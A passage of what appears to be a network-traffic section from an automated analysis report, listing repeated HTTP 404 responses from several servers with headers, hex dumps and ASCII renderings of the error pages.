64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:21:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLjwqwQn%2FzTSx4KGGKeioXLoaD2kAIM%2Ftht%2BD%2F5KuzQpZVSuLJHawDMiO8w8aRIRQfZ5KZs4DMCu1iAK0v3tzi02NXx1VXThWsL77bVFMvs3jjNnM%2BTnE1kG2MJTOIEyhOabGROFl0U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fbfc9fd5d37-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126969&min_rtt=126969&rtt_var=63484&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=856&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6a c3 30 10 44 ef fa 8a 6d ee f6 3a 21 87 1e 16 41 1b 3b 34 e0 a6 a6 55 0e 39 aa d1 16 99 24 96 23 ad 6b fa f7 c5 0e 85 5e 67 de 0c 33 f4 50 be 6d cc b1 a9 e0 c5 bc d6 d0 1c 9e eb dd 06 16 19 e2 ae 32 5b c4 d2 94 77 67 95 17 88 d5 7e a1 15 79 b9 5e 34 79 b6 4e 2b 92 56 2e ac d7 c5 1a f6 41 60 1b 86 ce 11 de 45 45 38 43 f4 19 dc cf 94 5b ea 7f 8c 5f 6a 45 bd 36 9e 21 f2 6d e0 24 ec e0 f0 5e c3 68 13 74 41 e0 6b e2 20 74 20 be 4d 90 38 7e 73 cc 09 fb a9 29 6a 45 d6 b9 c8 29 e9 a7 de 9e 3c c3 c7 0c 80 15 18 c7 31 bf 72 f2 e7 36 3b 85 6c 38 e7 c9 87 1e 9a 10 05 1e 0b c2 bf 9c 22 9c 87 11 ce 87 7e 01 00 00 ff ff e3 02 00 a7 8f 5e 7f 0b 01 00 00 0d 0a Data Ascii: e5Lj0Dm:!A;4U9$#k^g3Pm2[wg~y^4yN+V.A`EE8C[_jE6!m$^htAk t M8~s)jE)<1r6;l8"~^
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o9c4%2FpnhRCrPeJxKKYPwcR13nyTu4v0AqHd8AzdL%2FGWPu1nLd59NmU5G0Bl%2FZ%2Btwk4Oz5rwxTb%2BM9cgIoMuviYAZ9eDiKaRseIQ4us27ck4L0QVLXrOh2DkQSjnCabjim6LpFTHYAYM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fd07fe62ba1-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=123482&min_rtt=123482&rtt_var=61741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=876&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=7200, stale-while-revalidate=7200, immutablecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N13lsXxU%2B7KaGQ0nrQxgRo9ZSEE9x2tScjBZOxIlKtwGVLLGVBNCr%2BH0BVOXFexAYerVOeFpje6c%2BWON4cJ8L1MAmcKTRR57qu8LEHT1dljOR%2B3Fofef5jetYPwfAszHjanQaI8wJy0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6fe12ddf96df-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130410&min_rtt=130410&rtt_var=65205&sent=2&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7133&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6a c3 30 10 44 ef fa 8a 6d ee f6 3a 21 87 1e 16 41 1b 3b 34 e0 a6 a6 55 0e 39 aa d1 16 99 24 96 23 ad 6b fa f7 c5 0e 85 5e 67 de 0c 33 f4 50 be 6d cc b1 a9 e0 c5 bc d6 d0 1c 9e eb dd 06 16 19 e2 ae 32 5b c4 d2 94 77 67 95 17 88 d5 7e a1 15 79 b9 5e 34 79 b6 4e 2b 92 56 2e ac d7 c5 1a f6 41 60 1b 86 ce 11 de 45 45 38 43 f4 19 dc cf 94 5b ea 7f 8c 5f 6a 45 bd 36 9e 21 f2 6d e0 24 ec e0 f0 5e c3 68 13 74 41 e0 6b e2 20 74 20 be 4d 90 38 7e 73 cc 09 fb a9 29 6a 45 d6 b9 c8 29 e9 a7 de 9e 3c c3 c7 0c 80 15 18 c7 31 bf 72 f2 e7 36 3b 85 6c 38 e7 c9 87 1e 9a 10 05 1e 0b c2 bf 9c 22 9c 87 11 ce 87 7e 01 00 00 ff ff e3 02 00 a7 8f 5e 7f 0b 01 00 00 0d 0a Data Ascii: e5Lj0Dm:!A;4U9$#k^g3Pm2[wg~y^4yN+V.A`EE8C[_jE6!m$^htAk t M8~s)jE)<1r6;l8"~^
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:22:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: public, max-age=14400, stale-while-revalidate=7200, immutableCF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q95XrPLbvELgWoWSvS2yWfNFacf2Z6J1LtdvMgy3JutSsh3slw%2FYBHdKK7gL4osrzHKdmDpwxYhuqNYF9WHxonTJKFwfVycGCW62l11qoYKpA6fYyEwuegFtxi5eazrIxC6NdclZIcE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930c6ff1c8ce9614-MIAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=121859&min_rtt=121859&rtt_var=60929&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 73 68 6b 69 2d 63 6f 2d 75 6b 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.meshki-co-uk.shop Port 
80</address></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:22:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:23:00 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 15 Apr 2025 15:23:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6e c2 30 10 44 ef f9 8a 2d a7 f6 80 37 45 41 ea c1 b2 d4 92 20 90 52 1a 15 e7 c0 d1 ad 17 39 02 e2 60 9b 86 fe 7d 9d a0 4a 5c 56 9a dd b7 a3 19 fe 90 7f 2c e4 ae 2a 60 25 df 4b a8 ea b7 72 bd 80 c9 14 71 5d c8 25 62 2e f3 db 65 c6 52 c4 62 33 11 09 37 e1 74 14 dc 90 d2 51 84 26 1c 49 64 69 06 1b 1b 60 69 2f ad e6 78 5b 26 1c 47 88 7f 59 fd 3b fc 3d 8b 3b 26 aa 84 77 42 1a 02 47 e7 0b f9 40 1a ea cf 12 7a e5 a1 8d dc 7e e0 c0 b6 10 4c e3 c1 93 fb 21 c7 38 76 83 93 8b 43 69 ed c8 7b f1 da a9 6f 43 38 63 19 9b cf e1 b1 6e 9b eb 13 6c 47 1c 54 80 be ef 99 3a ec 9b eb f4 e4 0f cc 07 eb 08 2a eb 02 bc a4 1c ff 3d 62 d4 31 64 8c 35 94 4b fe 00 32 4e 83 e0 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ecMn0D-7EA R9`}J\V,*`%Krq]%b.eRb37tQ&Idi`i/x[&GY;=;&wBG@z~L!8vCi{oC8cnlGT:*=b1d5K2N0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx-reuseport/1.21.1 | Date: Tue, 15 Apr 2025 15:23:05 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 279 | Connection: close | Vary: Accept-Encoding | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.akfix-msk.store Port 80</address></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Apr 2025 15:23:27 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Tue, 15 Apr 2025 15:23:27 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2B6PBzXoARzKEfbf5RyIzOsVHVw5ZCnaxmp6eO9IWPU%2Fw%2B0%2BbJ3q8LX3ImB4akK9guZVopsg%2BMk1iI8qJvi%2FeTayWVX3AoVqIPmk73AZ%2BoaxfplzSsu3nVP21X70b3MppflTHsBoHQEbyw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 930c71b4bbe24065-MIA | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=121268&min_rtt=121268&rtt_var=60634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=862&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, hex dump omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Apr 2025 15:23:29 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Tue, 15 Apr 2025 15:23:29 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOP2nc%2BQEMofCDq2tc3QUgJ9fqd6hbAbmEJSO0QTUxJ2sCHd1Y9wK4MDCjNocuc95CBmPJM%2F4m0toJnagTJIKSBJPay8iL%2BC7Ni2ynV669tIqsoreEM2yI50FVPjNjrmnGmOPzhZcAla3w%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 930c71c56d8b987e-MIA | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=124087&min_rtt=124087&rtt_var=62043&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=882&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, hex dump omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Apr 2025 15:23:32 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Tue, 15 Apr 2025 15:23:32 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fb%2BJMdYR3oYtSexev4Wq6SbTfV0tHhKrhVVRmyQKazuubieQopbeokXj%2BhpPvAFWhUvBPGukO3dWlmrqeWZ33wMpgIFatVNkMM%2BQbM61dsqYhHS%2BeQMvh5Tx3iFppaJpWtDrutFkvLgxeQ%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 930c71d618ad6dda-MIA | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=120966&min_rtt=120966&rtt_var=60483&sent=1&recv=8&lost=0&retrans=0&sent_bytes=0&recv_bytes=7139&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, hex dump omitted)
